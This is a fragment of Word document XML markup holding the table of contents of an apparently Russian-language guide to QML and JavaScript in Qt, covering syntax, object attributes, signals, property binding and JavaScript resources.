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body>
    <w:p w:rsidR="000D7D84" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidR="000D7D84">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>главление</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-6" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc483605093" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605093 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</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094" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ОБЗОР</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605094 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</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095" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ОСНОВЫ СИНТАКСИСА</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605095 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14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096" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t xml:space="preserve">АТРИБУТЫ ОБЪЕКТОВ </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605096 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15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097" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>Специальные свойства</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605097 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15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098" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Свойство по умолчанию</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605098 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16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099" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Readonly</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>свойство</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605099 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16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00" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property modifier objects</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605100 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16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01" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Сигналы</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605101 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17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02" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Встроенные</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> property-change signals</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605102 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17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03" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Signal Handler Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605103 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17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04" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property Change Signal Handlers</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605104 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18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05" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Method Attributes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605105 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18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06" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Attached Properties and Attached Signal Handlers</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605106 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</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07" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>Далучаныя ўласцівасці не работаюць для дэлегатаў</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605107 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19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108" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>СВЯЗЫВАНИЕ СВОЙСТВ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605108 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20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109" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>СИСТЕМА</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>СИГНАЛОВ</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>И</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ОБРАБОТЧИКОВ</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>СИГНАЛОВ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605109 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21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110" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ИНТЕГРИРОВАНИЕ QML И JAVA SCRIPT</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605110 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23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11" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">JAVA SCRIPT </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ВЫРАЖЕНИЕ</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>В</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> QML </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ДОКУМЕНТАХ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605111 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23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12" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript in Application Startup Code</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605112 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24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13" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ОПРЕДЕЛЕНИЕ JAVA SCRIPT РЕСУРСОВ В QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605113 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25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14" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Code-Behind Implementation Resource</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605114 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25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15" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Shared JavaScript Resources (Libraries)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
